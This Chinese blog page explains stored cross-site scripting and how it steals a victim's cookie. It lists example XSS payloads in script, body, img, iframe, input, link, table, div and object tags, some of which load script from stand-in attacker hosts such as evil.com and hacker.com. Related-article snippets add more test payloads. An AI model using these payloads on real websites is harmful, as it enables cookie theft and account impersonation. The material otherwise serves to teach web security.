XSS 攻击案例

最新推荐文章于 2024-10-14 21:12:25 发布
最新推荐文章于 2024-10-14 21:12:25 发布
阅读量2.5k 收藏
点赞数
分类专栏: 前端 文章标签: xss

xss

  1. The attacker injects a payload in the website’s database by submitting a vulnerable form with some malicious JavaScript
  2. The victim requests the web page from the website
  3. The website serves the victim’s browser the page with the attacker’s payload as part of the HTML body.
  4. The victim’s browser will execute the malicious script inside the HTML body. In this case it would send the victim’s cookie to the attacker’s server. The attacker now simply needs to extract the victim’s cookie when the HTTP request arrives to the server, after which the attacker can use the victim’s stolen cookie for impersonation.

Some examples of Cross-site Scripting attack vectors

The following is a non-exhaustive list of XSS attack vectors that an attacker could use to compromise the security of a website or web application through an XSS attack. A more extensive list of XSS payload examples is maintained here.

  • <script> tag

The <script> tag is the most straight-forward XSS payload. A script tag can either reference external JavaScript code, or embed the code within the script tag.

<!-- External script -->
<script src=http://evil.com/xss.js></script>
<!-- Embedded script -->
<script> alert("XSS"); </script>
  • <body> tag

An XSS payload can be delivered inside <body> tag by using the onload attribute or other more obscure attributes such as the background attribute.

<!-- onload attribute -->
<body onload=alert("XSS")>
<!-- background attribute -->
<body background="javascript:alert("XSS")">
  • <img> tag

Some browsers will execute JavaScript when found in the <img>.

<!-- <img> tag XSS -->
<img src="javascript:alert("XSS");">
<!--  tag XSS using lesser-known attributes -->
<img dynsrc="javascript:alert('XSS')">
<img lowsrc="javascript:alert('XSS')">
  • <iframe> tag

The <iframe> tag allows the embedding of another HTML page into the parent page. An IFrame can contain JavaScript, however, it’s important to note that the JavaScript in the iFrame does not have access to the DOM of the parent’s page due to the browser’s Content Security Policy (CSP). However, IFrames are still very effective means of pulling off phising attacks.

<!-- <iframe> tag XSS -->
<iframe src=”http://evil.com/xss.html”>
  • <input> tag

In some browsers, if the type attribute of the <input> tag is set to image, it can be manipulated to embed a script.

<!-- <input> tag XSS -->
<input type="image" src="javascript:alert('XSS');">
  • <link> tag

The <link> tag, which is often used to link to external style sheets could contain a script.

<!-- <link> tag XSS -->
<link rel="stylesheet" href="javascript:alert('XSS');">
  • <table> tag

The background attribute of the table and td tags can be exploited to refer to a script instead of an image.

<!-- <table> tag XSS -->
<table background="javascript:alert('XSS')">
<!-- <td> tag XSS -->
<td background="javascript:alert('XSS')">
  • <div> tag

The <div> tag, similar to the <table> and <td> tags can also specify a background and therefore embed a script.

<!-- <div> tag XSS -->
<div style="background-image: url(javascript:alert('XSS'))">
<!-- <div> tag XSS -->
<div style="width: expression(alert('XSS'));">
  • <object> tag

The <object> tag can be used to include in a script from an external site.

<!-- <object> tag XSS -->
<object type="text/x-scriptlet" data="http://hacker.com/xss.html">
Json_M
关注
专栏目录
XSS攻击实例1
01-11
简单让你了解xss攻击。 项目基于Asp.net 框架,VS2010下创建,C#语言
XSS跨站脚本攻击
weixin_30505225的博客
04-26 1126
1、简介 跨站脚本(cross site script)为了避免与样式css混淆,所以简称为XSSXSS是一种经常出现在web应用中的计算机安全漏洞,也是web中最主流的攻击方式。那么什么是XSS呢? XSS是指恶意攻击者利用网站没有对用户提交数据进行转义处理或者过滤不足的缺点,进而添加一些代码,嵌入到web页面中去。使别的用户访问都会执行相应的嵌入代码。 从而盗取用户资料、利用用户身...
一篇 带你了解 XSS——(上篇)
最新发布
qq_62987084的博客
10-14 1102
关于XSS的介绍
10个XSS攻击实例
m0_49521873的博客
05-25 2044
1. Cookie盗窃攻击攻击者可以通过注入恶意代码,获取用户的 Cookie,并利用 Cookie 进行身份验证,获取用户的敏感信息。4. 注入点击劫持攻击攻击者可以注入一段代码,将隐藏的按钮伪装成用户需要点击的区域,当用户点击时,实际上在执行一个恶意操作。9. 恶意相片攻击攻击者可以在从社交媒体网站下载的相片中注入一段代码,当用户查看相片时,代码就会临时运行,窃取用户的信息。8. 恶意广告攻击攻击者可以在广告中注入一段代码,当用户点击广告时,代码就可以窃取用户的个人信息。
XSS攻击实例分析
mdp1234的博客
07-29 4553
例1、简单XSS攻击 留言类,简单注入javascript 万能测试XSS漏洞代码:"/></textarea><script>alert(1)</script> 有个表单域:<input type=“text” name=“content” value=“这里是用户填写的数据”> 1、假若用户填写数据为:<script>alert('foolish!')</script>(或者<script type=..
32个触发事件XSS语句的总结
weixin_33788244的博客
01-26 473
作者为monyer 1、onmouseenter:当鼠标进入选区执行代码 <div style="background-color:red" onmouseenter="alert('bem')">123456</div> 2、onmouseleave:当鼠标离开选区执行代码 <DIV style="BACKGROUND-COLO...
XSS防护:XSS攻击案例分析.docx
08-28
XSS防护:XSS攻击案例分析.docx
web安全之XSS攻击demo
04-18
本篇将深入探讨XSS攻击的概念、类型、危害以及防范措施,并结合提供的"web安全之XSS攻击demo"进行详细讲解。 XSS攻击是通过注入恶意脚本到Web页面中,使得当其他用户浏览这些页面时,脚本被执行,从而可以盗取用户...
SpringBoot +esapi 实现防止xss攻击 实战代码
11-25
在SpringBoot项目中集成ESAPI(Enterprise Security API)可以有效地防止XSS攻击。本文将深入探讨如何在SpringBoot应用中结合springSecurity过滤器链,利用ESAPI库实现XSS防护。 首先,让我们了解ESAPI。ESAPI是一...
WEB 安全,浅谈 XSS 攻击(附简单实例)
DisMisPres的博客
12-29 3433
为什么说一些网站上的弹出广告(一刀999)不要去点,特别是已经登录过的网站,个人信息的泄露等都很有可能是从这里泄露的。由于XSS这种攻击手法是很常见且基础的方式,目前大多数的web框架都对其做过适配了,我们也不需要太过担心这种安全问题,但是还是要知道有这么回事,并能够有相应的处理方案。现在大多数的项目都是前后端分离的,前后端都要对XSS有所了解,在实际开发中需要多考虑下这类安全问题。
各类花里胡哨的XSS攻击举例解读(正在持续更新中~)
WalterBailey's Blog
04-24 2730
文章目录XSS攻击XSS Payload“Cookie劫持”攻击更为强大XSS Payload构造GET和POST请求GET请求POST请求通过XSS Payload读取QMail用户的邮件文件夹XSS钓鱼识别用户浏览器通过XSS读取浏览器的UserAgent对象:另一种方法识别用户安装的软件 XSS攻击 XSS Payload XSS攻击成功后,攻击者能够对用户当前浏览的页面植入恶意脚本,通过...
XSS漏洞实例
Sumarua的博客
06-19 1208
xss闯关游戏 实战靶场:云演xss漏洞靶场 第一关 直接输出 (1)分析 XSS 测试中一般使用弹窗的方式进行测试。 (2)弹窗代码示例: 此时弹窗回显为1,说明我们输入的指令被成功执行,存在低级的xss漏洞 第二关 value 此时我们再执行这条命令时发现无反应,没有弹窗也没有回显 示例结果 第三关 简单过滤 又叫复写 ,是一种简单的绕过姿势 第四关 简单过滤 当我们输入带有alert的字符时会直接退出脚本执行 javascript中 prompt()方法用于显示一个带有提
XSS(跨站脚本攻击)原理详解(内含攻击实例)
qq_52642385的博客
07-05 7148
军锋真人cs野战123平台、xss平台(推荐自行搭建xss平台,不让别人白嫖咱自个的成果,蓝莲花战队的那个就挺好)、webshell箱子、postman、beef(kali上可能要自行下载,三行命令即可)、burpsuite、xsstrike【内含软件使用方法】原理:前端提交的一些参数转换为js代码,可以回显一些东西跨站:例如你将一段攻击代码通过留言存储到对方服务器上时,对方管理员在浏览时就可能会执行你所写的攻击语句。产生层面:前端函数类:一般应用js里面的一些输出类函数但是会受浏览器内核影响,一些浏览器会
能够发现90%以上XSS漏洞的7个主要的XSS案例
weixin_42976700的博客
11-04 1915
在阅读有关XSS的材料时,我们通常会看到经典的<script> alert(1)</ script>作为这种漏洞的证明(PoC –概念证明)。尽管确实如此,但它并没有超出此范围,这使得该领域的新手可以寻求更多解决方案来应对现实情况。 因此,这是每个人都应该知道能够利用那里的绝大多数XSS缺陷的7种情况。建立了一个网页来显示它们的变化(单引号或双引号)来进行训练(单击以转到它): 在源代码的开头,有一个HTML注释,其中包含用于触发每种情况的所有参数。它们都适...
Web安全之XSS
至尊宝猴哥
02-16 466
XSS 全称(Cross Site Scripting) 跨站脚本攻击, 是Web程序中最常见的漏洞。指攻击者在网页中嵌入客户端脚本(例如JavaScript), 当用户浏览此网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的.  比如获取用户的Cookie,导航到恶意网站,携带木马等。 作为测试人员,需要了解XSS的原理,攻击场景,如何修复。 才能有效的防止XSS的发生。  阅读目录XSS
XSS漏洞简介、危害与分类及验证
jennycisp的博客
06-27 8017
定义/原理:跨站脚本(Cross-Site Scripting),本应该缩写为CSS,但是该缩写已被层叠样式脚本Cascading Style Sheets所用,所以改简称为XSS。也称跨站脚本或跨站脚本攻击。跨站脚本攻击XSS通过将恶意得Script代码注入到Web页面中,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。本质:是一种针对网站应用程序的安全漏洞攻击技术,是代码注入的一种。特点:XSS主要基于JavaScript。
无处不在的安全漏洞-XSS(1) 攻击方式和危害及实例讲解
AAAAAAAAAAAA66的博客
12-08 4353
接触xss和sql很久了,当初看了一遍原理,随便练一个dvwa就觉得自行了,实际上自己离熟练掌握还有很长的距离,这篇帖子会一直更,介绍完原理后会放些相关知识点,CTF题目或者是些实操(仅作学习用)----- 会一(要)直(收)更(藏)的(哦) XSS介绍 XSS又叫CSS(Cross Site Scripting),中文名叫跨站脚本攻击,在Owasp top 漏洞排名中,常年位居前列。是一种在Web应用中常见的安全漏洞,它允许将恶意代码植入Web页面,当其他用户访问此页面时,植入的恶意代码就会.
XSS漏洞
zhoutong2323的博客
04-19 2631
XSS漏洞(Cross-Site Scripting)是一种常见的Web应用程序安全漏洞,它允许攻击者在受害者的浏览器中注入恶意脚本。当受害者访问包含恶意脚本的网页时,攻击者就可以利用该漏洞来执行任意的代码,例如窃取用户的敏感信息、修改网页内容或进行其他恶意活动。
XSS攻击详解与防范策略
Yamanner蠕虫就是一个典型的XSS攻击案例,它利用了YahooMail系统的一个漏洞,让用户在查看邮件时执行嵌入在邮件中的JavaScript代码。病毒脚本通过Ajax技术轻松向YahooMail系统发起请求,获取用户的联系人列表并传播...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值